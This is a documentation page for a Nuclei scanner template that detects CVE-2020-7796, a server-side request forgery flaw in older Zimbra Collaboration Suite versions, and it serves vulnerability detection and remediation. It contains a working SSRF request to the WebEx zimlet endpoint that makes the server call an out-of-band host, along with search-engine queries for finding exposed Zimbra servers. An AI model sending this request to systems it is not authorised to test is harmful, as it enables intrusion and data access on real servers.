Skip to content
Nuclei Templates

Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery

ID: CVE-2020-7796

Severity: critical

Author: gy741

Tags: cve,cve2020,zimbra,ssrf,oast,synacor

Description

Section titled “Description”

Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled.

YAML Source

Section titled “YAML Source”
id: CVE-2020-7796


info:
  name: Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery
  author: gy741
  severity: critical
  description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access or data leakage.
  remediation: |
    Apply the latest patch or upgrade to Zimbra Collaboration Suite version 8.8.15 Patch 7 or higher to mitigate this vulnerability.
  reference:
    - https://www.adminxe.com/2183.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7796
    - https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-7796
    cwe-id: CWE-918
    epss-score: 0.70648
    epss-percentile: 0.9795
    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: synacor
    product: zimbra_collaboration_suite
    shodan-query:
      - http.title:"zimbra collaboration suite"
      - http.title:"zimbra web client sign in"
    fofa-query:
      - title="zimbra web client sign in"
      - title="zimbra collaboration suite"
    google-query:
      - intitle:"zimbra collaboration suite"
      - intitle:"zimbra web client sign in"
  tags: cve,cve2020,zimbra,ssrf,oast,synacor


http:
  - raw:
      - |
        GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4b0a00483046022100833b26c567ed4a49d0b42cf157a27b74a153a8c7db359ca41ef46ea5a0a5e5a602210085c08092c4f20f55cf36534e10f73f74c0b410282b872e4da3fd000dd632fc5a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-7796.yaml"

View on Github